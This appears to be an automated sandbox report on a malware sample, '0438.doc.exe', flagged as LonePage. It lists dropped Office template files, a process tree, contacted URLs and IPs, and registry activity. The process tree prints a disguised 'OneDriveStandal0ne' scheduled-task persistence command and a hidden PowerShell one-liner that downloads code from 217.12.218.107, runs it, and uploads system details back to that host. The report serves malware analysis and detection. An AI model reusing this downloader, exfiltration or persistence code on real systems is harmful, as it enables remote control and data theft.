C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457491[[fn=Metropolitan]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457496[[fn=Parallax]].thmx (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457503[[fn=Quotable]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457510[[fn=Savon]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM03457515[[fn=View]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033917[[fn=Berlin]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033919[[fn=Circuit]].thmx (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033921[[fn=Damask]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033925[[fn=Droplet]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033927[[fn=Main Event]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033929[[fn=Slate]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM04033937[[fn=Vapor Trail]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001114[[fn=Gallery]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\TM10001115[[fn=Parcel]].thmx (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328884[[fn=architecture]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328893[[fn=BracketList]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328905[[fn=Chevron Accent]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328908[[fn=Circle Process]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328916[[fn=Converging Text]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328919[[fn=Hexagon Radial]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox (copy)

Zip archive data, at least v2.0 to extract, compression method=deflate

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox (copy)

Microsoft OOXML

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl (copy)

XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl (copy)

XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl (copy)

XML 1.0 document, ASCII text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx (copy)

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx (copy)

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx (copy)

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx (copy)

Microsoft Word 2007+

dropped

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Unicode text, UTF-16, little-endian text, with CRLF line terminators

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2T9UIF0GJWSJEOX62T4R.temp

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\O259ZSSS68M9HDS5DNMV.temp

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms (copy)

data

dropped

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms~RF32d89.TMP (copy)

data

dropped

C:\Users\user\Desktop\05.2022 ??????? ??????????-????.??????.doc

Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: , Author: zv1, Template: Normal.dotm, Last Saved By: OlgaKadru, Revision Number: 49, Name of Creating Application: Microsoft Office Word, Total Editing Time: 03:16:00, Last Printed: Mon May 2 18:07:00 2022, Create Time/Date: Mon Jan 28 06:45:00 2019, Last Saved Time/Date: Mon May 2 18:09:00 2022, Number of Pages: 1, Number of Words: 215, Number of Characters: 1226, Security: 0

dropped

C:\Users\user\Desktop\~$.2022 ??????? ??????????-????.??????.doc

data

dropped

There are 229 hidden files, click here to show them.

Processes

Path

Cmdline

Malicious

C:\Users\user\Desktop\0438.doc.exe

"C:\Users\user\Desktop\0438.doc.exe"

Details

Is windows:	false
Is dropped:	false
PID:	6984
Target ID:	0
Parent PID:	1028
Name:	0438.doc.exe
Path:	C:\Users\user\Desktop\0438.doc.exe
Commandline:	"C:\Users\user\Desktop\0438.doc.exe"
Size:	125440
MD5:	B8A51009C3B6ED621E6C50C49B2E6269
Time:	13:25:47
Date:	25/04/2024
Reason:	newprocess
Reputation:	low
Is admin:	true
Is elevated:	true
Modulebase:	0x290000
Modulesize:	147456
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Multi AV Scanner detection for submitted file	AV Detection
Sigma detected: Suspicious Double Extension File Execution	System Summary
Yara detected LonePage	Stealing of Sensitive Information, Remote Access Functionality
Machine Learning detection for sample	AV Detection
Uses an obfuscated file name to hide its real file extension (double extension)	Hooking and other Techniques for Hiding and Protection	Masquerading Obfuscated Files or Information
Queries the volume information (name, serial number etc) of a device	Language, Device and Operating System Detection	System Information Discovery
Sample file is different than original file name gathered from version info	System Summary
Sigma detected: Suspicious Schtasks From Env Var Folder	System Summary
Uses 32bit PE files	Compliance, System Summary
PE file has an executable .text section and no other executable section	System Summary
Parts of this applications are using the .NET runtime (Probably coded in C#)	System Summary
Sample is known by Antivirus	System Summary
Spawns processes	System Summary	Process Injection
Contains modern PE file flags such as dynamic base (ASLR) or NX	Compliance, System Summary
PE file contains a COM descriptor data directory	System Summary

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /tn OneDriveStandal0ne /tr C:\Users\Public\Libraries\OneDriveUpdate.js /sc minute /mo 20 /f

Details

Is windows:	true
Is dropped:	false
PID:	5728
Target ID:	3
Parent PID:	6984
Name:	schtasks.exe
Class:	system-tools
Path:	C:\Windows\System32\schtasks.exe
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn OneDriveStandal0ne /tr C:\Users\Public\Libraries\OneDriveUpdate.js /sc minute /mo 20 /f
Size:	235008
MD5:	76CD6626DD8834BD4A42E6A565104DC2
Time:	13:25:48
Date:	25/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff743320000
Modulesize:	253952
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Uses schtasks.exe or at.exe to add and modify task schedules	Boot Survival	Scheduled Task/Job
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Suspicious Schtasks From Env Var Folder	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\wscript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\OneDriveUpdate.js"

Details

Is windows:	true
Is dropped:	false
PID:	3716
Target ID:	5
Parent PID:	1068
Name:	wscript.exe
Class:	wscript
Path:	C:\Windows\System32\wscript.exe
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\OneDriveUpdate.js"
Size:	170496
MD5:	A47CBE969EA935BDD3AB568BB126BC80
Time:	13:25:50
Date:	25/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff718aa0000
Modulesize:	184320
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Yara detected LonePage	Stealing of Sensitive Information, Remote Access Functionality
Sigma detected: Script Interpreter Execution From Suspicious Folder	System Summary
Sigma detected: WScript or CScript Dropper	System Summary
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript	System Summary
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://217.12.218.107:30139/GvAIGRxavbGeLRAx/page61/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://217.12.218.107:25928/page61',$drpy);}

Details

Is windows:	true
Is dropped:	false
PID:	7424
Target ID:	11
Parent PID:	3716
Name:	powershell.exe
Class:	powershell
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c $iik=new-object net.webclient;$flm=$iik.downloaddata('http://217.12.218.107:30139/GvAIGRxavbGeLRAx/page61/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$bjdo+=IEX $jkr\|out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};$ujk=new-object net.webclient;$ujk.uploaddata('http://217.12.218.107:25928/page61',$drpy);}
Size:	452608
MD5:	04029E121A0CFA5991749937DD22A1D9
Time:	13:25:52
Date:	25/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff7be880000
Modulesize:	462848
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Yara detected LonePage	Stealing of Sensitive Information, Remote Access Functionality
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Suspicious execution chain found	Software Vulnerabilities	Exploitation for Client Execution
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
Binary contains paths to debug symbols	Compliance, System Summary

C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\05.2022 ??????? ??????????-????.??????.doc" /o ""

Details

Is windows:	true
Is dropped:	false
PID:	2296
Target ID:	2
Parent PID:	6984
Name:	WINWORD.EXE
Class:	word
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\05.2022 ??????? ??????????-????.??????.doc" /o ""
Size:	1620872
MD5:	1A0C2C2E7D9C4BC18E91604E9B0C7678
Time:	13:25:48
Date:	25/04/2024
Reason:	newprocess
Reputation:	moderate
Is admin:	true
Is elevated:	true
Modulebase:	0x90000
Modulesize:	1617920
Wow64:	true

Signature Hits	Behavior Group	Mitre Attack
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Allocates a big amount of memory (probably used for heap spraying)	Software Vulnerabilities	Extra Window Memory Injection
Spawns processes	System Summary	Process Injection
Starts Microsoft Word	Hooking and other Techniques for Hiding and Protection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	5736
Target ID:	4
Parent PID:	5728
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	13:25:48
Date:	25/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	true
Is elevated:	true
Modulebase:	0x7ff6d64d0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

C:\Windows\System32\conhost.exe

C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Details

Is windows:	true
Is dropped:	false
PID:	7432
Target ID:	12
Parent PID:	7424
Name:	conhost.exe
Path:	C:\Windows\System32\conhost.exe
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Size:	862208
MD5:	0D698AF330FD17BEE3BF90011D49251D
Time:	13:25:53
Date:	25/04/2024
Reason:	newprocess
Reputation:	high
Is admin:	false
Is elevated:	false
Modulebase:	0x7ff6d64d0000
Modulesize:	892928
Wow64:	false

Signature Hits	Behavior Group	Mitre Attack
Spawns processes	System Summary	Process Injection

URLs

Name

Malicious

http://pesterbdd.com/images/Pester.png

unknown

http://217.12.218.107:25928/page61

unknown

http://217.12.218.107:30139/GvAIGRxavbGeLRAx/page61/upgrade.txt

unknown

http://217.12.218.107:30139/GvAIG

unknown

http://217.12.218.107:30139

unknown

http://nuget.org/NuGet.exe

unknown

http://www.apache.org/licenses/LICENSE-2.0.html

unknown

https://go.micro

unknown

http://217.12.218.107:30139/gvaigrxavbgelrax/page61/upgrade.txt

unknown

https://contoso.com/

unknown

https://nuget.org/nuget.exe

unknown

https://contoso.com/License

unknown

https://contoso.com/Icon

unknown

https://aka.ms/pscore68

unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

unknown

https://github.com/Pester/Pester

unknown

There are 6 hidden URLs, click here to show them.

IPs

Domain

Country

Malicious

217.12.218.107

unknown

Ukraine

Details

IP:	217.12.218.107
TargetID:	11
Current Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Country:	Ukraine
Countrycode:	UKR
ASN number:	21100
ASN name:	ITLDC-NLUA
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Bypasses PowerShell execution policy	HIPS / PFW / Operating System Protection Evasion	PowerShell
Suspicious powershell command line found	Data Obfuscation	PowerShell
Wscript starts Powershell (via cmd or directly)	System Summary	PowerShell Scripting
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Sigma detected: Change PowerShell Policies to an Insecure Level	System Summary
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation	System Summary
Sigma detected: Usage Of Web Request Commands And Cmdlets	System Summary
Very long cmdline option found, this is very uncommon (may be encrypted or packed)	HIPS / PFW / Operating System Protection Evasion	Command and Scripting Interpreter
Connects to IPs without corresponding DNS lookups	Networking
Sigma detected: Non Interactive PowerShell Process Spawned	System Summary
Spawns processes	System Summary	Process Injection
URLs found in memory or binary data	Networking

Registry

Path

Value

Malicious

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached

{97E467B4-98C6-4F19-9588-161B7773D6F6} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

LangID

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE.FriendlyAppName

HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache

C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE.ApplicationCompany

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\2296

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems

7d/

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Wizards

PageSize

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\MailSettings

Template

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options

AutoRecoverySaveIntervalMetadata

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word

Language

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word

EcsRequestPending

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word

SubscriptionCustomerLicenseInfo

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options

FirstRun

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options

ACUpdated

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options

DefaultKerningLigatures

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\WEF

Word_RequireForceRefreshAtBoot

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency

PotentialDataLossInfo2

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ReviewCycle

ReviewToken

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

FOLDERID_Desktop

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

FOLDERID_Documents

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Place MRU

FOLDERID_Desktop

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Place MRU

FOLDERID_Documents

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru

Item 21

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Place MRU

Item 1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\30968

30968

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word

BuildNumber

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word

Expires

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

ChunkCount

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.1

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.2

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.3

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.4

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.5

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.6

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.7

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.8

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.9

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.10

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.11

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.12

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.13

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.14

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.15

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.16

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.17

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.18

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.19

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.20

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.21

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.22

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.23

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.24

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.25

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.26

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.27

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

1.28

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData

VersionId

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word

ETag

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word

DeferredConfigs

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word

ConfigIds

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\FileBlock

FileTypeBlockList

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\FileBlock

OoxmlConverterBlockList

